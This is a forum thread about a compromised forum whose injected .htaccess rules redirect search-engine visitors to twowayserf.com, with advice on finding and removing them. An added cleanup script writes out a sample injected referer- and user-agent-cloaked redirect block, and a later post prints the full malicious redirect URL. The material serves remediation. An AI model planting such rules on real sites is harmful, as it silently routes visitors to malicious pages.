September 19th, 2011, 15:15
(This post was last modified: September 20th, 2011, 05:11 by KingOfPain.)
Nathan is on leave of absence. It was gracious of him to stop by and look, and he provided me with some advice. I must say it all looks geek to me, and it looks like I need to dig deep. What I have to remove is hidden all over the VB scripts, as you suspected. I'd also need to upgrade to the latest patch once it's done.
I am sorry to say it is going to take longer than it needs to, because it looks over my head and I am having some eye issues, so I can't spend an extended amount of time reading text...
KoP
September 20th, 2011, 02:00
Hi KoP,
it's okay if it takes some time, as long as it's done at all. Many webmasters simply don't care which plays right into the hands of the criminals, so thanks for doing this.
There are two kinds of fools. One says, "This is old, and therefore good." And one says, "This is new, and therefore better." - John Brunner, The Shockwave Rider
September 20th, 2011, 09:35
Are there any offline backups of the code that you can restore from? I had the same thing happen to my site at http://www.dos486.com, something got access and injected malware links into all the HTML files. I recovered from that by re-uploading from my clean local copy.
October 19th, 2011, 02:10
Sorry to necro a month old thread, but since the problem's still ongoing (well, insofar as the redirect's still happening, although admittedly "twowayserf.com" no longer exists, so it's more a problem of style than function now) I figured I'd chime in with my 2c.
These "twowayserf" tools seem to operate by taking advantage of bad filesystem permissions to upload busted .htaccess files which use mod_rewrite to 302 a user based on his referer (you knew this already I assume.) Based on some other poor bastard's report here it looks like it triggers on a bunch of search engine URLs in the Referer: field (99% of that guy's .htaccess is making sure that the user-agent in question is actually a browser, by the looks.)
In a nutshell, I'd suggest that the 10 second fix is to disable .htaccess globally for the RB vhost in your apache config. Having said that, VBulletin may well need .htaccess for legit functionality, so you could also try disabling mod_rewrite for RB, which would also do the trick.
If you have shell access to the machine RB's hosted on, you should be able to do something like "find . -name .htaccess -exec sed -i -e 's/^Rewrite/#Rewrite/' {} \;" from RB's webroot, which will comment out any mod_rewrite invocations within .htaccess files, while having no other side effects.
Of course, to prevent a recurrence of this issue you'll likely need to figure out how they suborned your .htaccess files in the first instance.
Again, apologies for the epic thread necromancy, but I figured my 2c may be useful to somebody. Feel free to ignore the noob/tell me to GTFO.
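As an added example (not code from the thread or from fantasticsid), here is a script that does the checking and cleanup described in the post above, but narrower than a blanket comment-out of every Rewrite line: it constructs a sample .htaccess of the kind described (a legitimate vBulletin-style rule plus an injected block that sends search-engine visitors to an external r.cgi), reports only RewriteRule lines that redirect to an absolute external URL after a RewriteCond on HTTP_REFERER, and disables just those lines, keeping a copy of the original file for the "how did they get in" investigation. The webroot, quarantine directory, file contents and the "disabled-by-cleanup" marker are assumptions for the demo; mod_rewrite treats a substitution that is an absolute URL on another host as an external redirect whether or not the R flag is present, which is why the check keys on the target rather than on the flags.

```shell
#!/bin/sh
# Added example, not from the thread. Finds and disables referer-triggered
# external redirects in .htaccess files, leaving legitimate rewrites alone.
set -eu

WEBROOT="${WEBROOT:-$(mktemp -d)}"          # assumption: scratch webroot
QUARANTINE="${QUARANTINE:-$(mktemp -d)}"    # assumption: kept outside the webroot

# Constructed sample: one legitimate rule, then an injected block that 302s
# anyone arriving from a search engine (and using a real browser UA) offsite.
make_sample() {
  mkdir -p "$WEBROOT/forums"
  cat > "$WEBROOT/forums/.htaccess" <<'EOF'
RewriteEngine On
RewriteBase /forums/
RewriteRule ^threads/([0-9]+)-.*$ showthread.php?t=$1 [L,QSA]
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|firefox|chrome|opera|safari).*$ [NC]
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing|msn|ask|aol)\.(.*) [NC]
RewriteRule ^(.*)$ http://twowayserf.com/cgi-bin/r.cgi?h=realmsbeyond.net&u=$1 [R=302,L]
EOF
}

# Print "file:line: rule" for every RewriteRule whose substitution is an
# absolute http(s) URL and whose preceding RewriteCond chain tests the referer.
# An absolute URL on another host is an external redirect even without [R].
find_referer_redirects() {
  find "$1" -name .htaccess -type f | while read -r f; do
    awk -v file="$f" '
      /^[[:space:]]*RewriteCond.*HTTP_REFERER/ { armed = 1; next }
      /^[[:space:]]*RewriteCond/               { next }   # other conds keep state
      /^[[:space:]]*RewriteRule/ {
        if (armed && $3 ~ /^https?:\/\//) printf "%s:%d: %s\n", file, NR, $0
        armed = 0; next
      }
      { armed = 0 }                                      # any other line breaks the chain
    ' "$f"
  done
}

# Disable only the offending RewriteCond/RewriteRule group(s) in one file:
# the conditions are buffered until the rule that consumes them is seen, then
# the whole group is commented out if it is a referer-triggered external
# redirect, otherwise emitted unchanged. Original file is copied to quarantine.
neutralize_referer_redirects() {
  f="$1"
  cp "$f" "$QUARANTINE/$(printf '%s' "$f" | tr '/' '_')"
  awk '
    function flush(prefix,  i) { for (i = 1; i <= n; i++) print prefix conds[i]; n = 0 }
    /^[[:space:]]*RewriteCond/ { conds[++n] = $0; next }
    /^[[:space:]]*RewriteRule/ {
      bad = 0
      for (i = 1; i <= n; i++) if (conds[i] ~ /HTTP_REFERER/) bad = 1
      if (bad && $3 ~ /^https?:\/\//) {
        flush("# disabled-by-cleanup: "); print "# disabled-by-cleanup: " $0
      } else {
        flush(""); print
      }
      next
    }
    { flush(""); print }
    END { flush("") }
  ' "$f" > "$f.tmp" && mv "$f.tmp" "$f"
}

# Stand-alone demo on the constructed sample.
make_sample
echo "Before cleanup:"; find_referer_redirects "$WEBROOT"
neutralize_referer_redirects "$WEBROOT/forums/.htaccess"
echo "After cleanup (no hits expected):"; find_referer_redirects "$WEBROOT"
cat "$WEBROOT/forums/.htaccess"
echo "Original kept in: $QUARANTINE"
```

Run it from the real webroot with WEBROOT and QUARANTINE pointed at the live tree and a directory outside it; review the "Before cleanup" listing before letting it modify anything. The quarantined copies keep the evidence needed for the follow-up the post mentions, working out how the files were altered in the first place, and the matching rule is intentionally conservative: it will not flag a same-host rewrite or a rule with no referer condition, so an injected block written differently still needs a manual read of the diff against a known-good copy.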
October 19th, 2011, 06:02
fantasticsid Wrote:Sorry to necro a month old thread, but since the problem's still ongoing (well, insofar as the redirect's still happening, although admittedly "twowayserf.com" no longer exists, so it's more a problem of style than function now) I figured I'd chime in with my 2c.
These "twowayserf" tools seem to operate by taking advantage of bad filesystem permissions to upload busted .htaccess files which use mod_rewrite to 302 a user based on his referer (you knew this already I assume.) Based on some other poor bastard's report here it looks like it triggers on a bunch of search engine URLs in the Referer: field (99% of that guy's .htaccess is making sure that the user-agent in question is actually a browser, by the looks.)
In a nutshell, I'd suggest that the 10 second fix is to disable .htaccess globally for the RB vhost in your apache config. Having said that, VBulletin may well need .htaccess for legit functionality, so you could also try disabling mod_rewrite for RB, which would also do the trick.
If you have shell access to the machine RB's hosted on, you should be able to do something like "find . -name .htaccess -exec sed -i -e 's/^Rewrite/#Rewrite/' {} \;" from RB's webroot, which will comment out any mod_rewrite invocations within .htaccess files, while having no other side effects.
Of course, to prevent a recurrence of this issue you'll likely need to figure out how they suborned your .htaccess files in the first instance.
Again, apologies for the epic thread necromancy, but I figured my 2c may be useful to somebody. Feel free to ignore the noob/tell me to GTFO.
I have no idea what this means, but it sounds pretty clever, so I suggest we do whatever he says.
Just bumping because I'm pretty sure this is not fixed. If I'm right, it should probably be stickied.
Erebus in the Balance - a FFH Modmod based around balancing and polishing FFH for streamlined competitive play.
Still getting this problem, searching from Yahoo fixes the search result problem.
On League of Legends I am "BertrandDeHorn"
September 3rd, 2012, 05:37
(This post was last modified: September 3rd, 2012, 09:42 by Jtm.)
The problem is still present. Seemingly every hundredth or so click goes to the following URL:
url: twowayserf.com/cgi-bin/r.cgi?p=10003&i=db89d4dd&j=320&m=355730b2230e946f310ab6f79c1ea293&h=realmsbeyond.net&u=/forums/forumdisplay.php&q=f=56&t=20120903032943
I do not believe this is a search engine issue. I believe the entry point to the Realms Beyond forums is somehow infected. I'd suggest admins check server-side for infections and unknown routines. There are malicious programs that only redirect every tenth or even every thousandth entry. They hide by doing this redirection statistically so rarely that people think it is not worth mentioning and investigating.
September 3rd, 2012, 06:04
Hi,
Jtm Wrote:The problem is still present. Seemingly every hundredth or so click goes to following url:
Could you (or a mod) please edit your post so that the URL is not clickable? Otherwise people might accidentally click on it and infect themselves.
Thanks!
-Kylearan
September 7th, 2012, 02:55
I joined the long list of people accidentally being redirected to twowayserf from a Google link. My virus protection didn't block the site, and virus scanning my computer doesn't seem to bring up any hits. So does anybody really know what this site actually tries to do, and should I be worried?